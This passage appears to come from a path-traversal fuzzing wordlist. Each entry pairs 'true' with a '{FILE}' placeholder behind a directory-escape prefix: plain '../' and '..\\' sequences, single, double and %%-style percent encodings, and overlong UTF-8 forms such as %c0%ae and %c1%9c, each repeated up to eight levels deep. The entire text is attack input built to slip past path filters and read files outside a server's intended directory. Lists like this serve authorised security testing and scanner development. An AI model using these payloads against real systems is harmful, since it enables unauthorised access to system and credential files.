"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,..%c0%af{FILE}",
"true,..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,..%%32%66{FILE}",
"true,..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,..%%35%63{FILE}",
"true,..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%5c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
